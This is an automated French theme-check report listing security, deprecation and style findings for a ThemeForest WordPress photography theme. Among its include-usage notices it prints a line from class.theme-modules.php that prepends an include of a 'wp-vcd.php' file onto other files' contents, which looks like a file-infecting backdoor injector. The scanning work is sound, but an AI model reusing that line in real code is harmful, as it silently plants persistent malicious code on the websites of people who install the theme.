Ceci est un thème distribué surThemeForest. Etant donné que tous les thèmes de Themeforest sont validés par un humain avant d'être mis en ligne, les règles de vérification de Themeforest sont plus permissives que celles de themecheck et peuvent donner un meilleur score de vérification ( Themeforest requirements ).

0
Alertes critiques
  1. Failles de sécurité : Modification des paramètres du serveur PHP ini_set trouvé dans le fichier class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
  2. Fichiers indésirables : fichiers ou dossiers cachés .ds_store .codeclimate.yml .gitignore .travis.yml .jshintrc .jshintignore .editorconfig .github .jscsrc .simplecov .csslintrc .coveralls.yml a été trouvé.
  3. Code malveillant : Opérations réseau curl_init trouvé dans le fichier envato.lib.php.
    Line 95: $ch = curl_init($url);
    curl_exec trouvé dans le fichier envato.lib.php.
    Line 106: $data = curl_exec($ch);
  4. Fonctions obsolètes : screen_icon screen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Line 1118: screen_icon();
  5. Fonctions obsolètes : wp_get_http wp_get_http trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 4.4. Il est prérable d'utiliser WP_Http à la place.
    Line 991: $headers = wp_get_http( $url, $upload['file'] );
  6. Inclusion de plugin : Présence de fichier zip Les plugins ne sont pas autorisés dans les thèmes. Le fichier zip revslider.zip envato-market.zip photography-custom-post.zip about-me-header.zip home-5-slider.zip home-4-slider.zip home-8-slider.zip home-11-slider.zip service-slider.zip home9-slider.zip home3-slider.zip a été trouvé.
Attention
  1. Script de core désabonné : Désabonnement d'un script de coreAppel à wp_deregister_script dans theme.filter.lib.php. Les thèmes ne doivent appeler wp_deregister_script sur des scripts du core.
    Line 841: wp_deregister_script('heartbeat');
  2. Text domain : Utilisation incorrecte des fonctions de traduction.Plusieurs text-domain sont utilisés dans le thème. Cela signifie que le thème n'est pas compatible avec les language packs de WordPress. Les domaines trouvés sont photography-translation, tgmpa, wordpress-importer, envato, textdomain, kirki, photography, grandnews.
  3. Répertoires indésirables : Répertoire de control de version GITGIT revision control directory.git a été trouvé.
  4. Barre d'admin cachée : Barre d'admin cachée dans CSSLes thèmes ne doivent pas cacher la barre d'admin. Détecté dans le fichier functions.css.
  5. Fonctions obsolètes : screen_iconscreen_icon trouvé dans le fichier wordpress-importer.php . Obsolète depuis la version de la 3.8.
    Line 1118: screen_icon();
  6. Screenshot : Copie d'écranLa taille du screenshot est 880x660px. La taille recommandée est 1200x900, pour prendre en compte les affichages HiDPI. Bien qu'une résolution de 1200x900 soit recommandée, toutes les images au format 4:3 sont acceptables.Mauvaise extension de fichier screenshot ! Le fichier screenshot.png n'est pas un véritable fichier JPG. Le type détecté est : "image/png".
Info
  1. Liens statiques : Présence de liens codés en durLien potentiellement codés en dur trouvé dans le fichier footer.php.
    Line 522: <a href='http://themegoods.theme-demo.net/photographyresponsivephotographytheme' cla
    Line 524: <a href='http://themes.themegoods.com/photography/landing2/customers-sites/' class='
    Line 526: <a href='http://themes.themegoods.com/photography/doc' class='demotip' title='Theme 
    Lien potentiellement codés en dur trouvé dans le fichier admin.lib.php.
    Line 240: <a href='https://themegoods.ticksy.com/submit/' target='_blank'>
    Line 291: $product_registration_html.='<br style='clear:both;'/><div style='height:20px'></div><div class='tg_error'><span class='dashicons dashicons-warning'></span> We can\'t find your purchase of '.THEMENAME.' theme. Please make sure you enter correct Envato Token. If you are sure you enter correct one. <a href='https://themegoods.ticksy.com' target='_blank'>Please open a ticket</a> to 
    Line 628: 'desc' => 'Enter Google Maps API Key <a href=\'https://themegoods.ticksy.com/article/7785/\' target=\'_blank\'>How to get 
    Line 322: <div class='getting_started_desc'>To enable auto update feature. You first must <a href=''.admin_url('themes.php?page=install-required-plugins').''>install Envato Market plugin</a> and enter your purchase code there. <a href='https://help.market.envato.com/hc/en-us/articles/202822600-Where-Is-My-Purc
    Lien potentiellement codés en dur trouvé dans le fichier widgets.lib.php.
    Line 299: <p><label for='<?php echo esc_attr($this->get_field_id('flickr_id')); ?>'>Flickr ID <a href='http://idgettr.com/'>Find your Flickr ID here</a>: <input class='widefat' i
    Line 461: <p><label for='<?php echo esc_attr($this->get_field_id('lat')); ?>'>Latitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 463: <p><label for='<?php echo esc_attr($this->get_field_id('long')); ?>'>Longitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 461: <p><label for='<?php echo esc_attr($this->get_field_id('lat')); ?>'>Latitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 463: <p><label for='<?php echo esc_attr($this->get_field_id('long')); ?>'>Longitude (<a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Lien potentiellement codés en dur trouvé dans le fichier shortcode_generator.php.
    Line 304: 'lat' => 'Map latitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 305: 'long' => 'Map longitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 304: 'lat' => 'Map latitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 305: 'long' => 'Map longitude <a href='http://www.tech-recipes.com/rx/5519/the-easy-way-to-find-latitude-and-longi
    Line 487: 'icon' => 'Enter icon class name ex. fa-star. <a href='http://fontawesome.io/cheatsheet/'>See all possible here</a>',
  2. Fichiers optionnels : Présence du fichierde style pour les écritures de droite vers la gauche rtl.cssCe thème ne contient pas le fichier optionnel rtl.php.
  3. Fichiers optionnels : Présence du fichier-template fron-*page.phpCe thème ne contient pas le fichier optionnel front-page.php.
  4. Fichiers optionnels : Présence du fichier-template de page d'accueil home.phpCe thème ne contient pas le fichier optionnel home.php.
  5. Fichiers optionnels : Présence du fichier template de taxinomie taxonomy.phpCe thème ne contient pas le fichier optionnel taxonomy.php.
  6. Fichiers optionnels : Présence du fichier-template author.phpCe thème ne contient pas le fichier optionnel author.php.
  7. Fichiers optionnels : Présence de du fichier-template des dates et heures date.phpCe thème ne contient pas le fichier optionnel date.php.
  8. Fichiers optionnels : Présence du fichier-template des pièces jointes attachment.phpCe thème ne contient pas le fichier optionnel attachment.php.
  9. Fichiers optionnels : Présence du fichier-template des images image.phpCe thème ne contient pas le fichier optionnel image.php.
  10. Utilisation d'includes : Utilisation de include ou de de requireLe thème semble utiliser include ou require : admin.lib.php
    Line 172: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : config.lib.php
    Line 46: require_once(ABSPATH . 'wp-admin/includes/file.php');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-envato-wordpress-theme-upgrader.php
    Line 11: include_once( ABSPATH . 'wp-admin/includes/class-wp-upgrader.php' );
    Line 13: include_once( 'class-envato-protected-api.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : script-responsive-css.php
    Line 24: require_once(get_template_directory().'/css/grid.css');
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : test-kirki-add_config.php
    Line 9: require_once( ABSPATH . WPINC . '/class-wp-customize-manager.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-kirki-control-fontawesome.php
    Line 42: include( $json_path );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class-kirki-helper.php
    Line 83: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : js-wp-editor.php
    Line 35: require( ABSPATH . WPINC . '/class-wp-editor.php' );
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
    Le thème semble utiliser include ou require : class.theme-modules.php
    Line 44: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    Si ces fonctions sont utilisées pour inclure des sections séparées d'un modèle à partir de fichiers indépendants, alors get_template_part () doit être utilisé à la place.
Autre thèmes vérifiés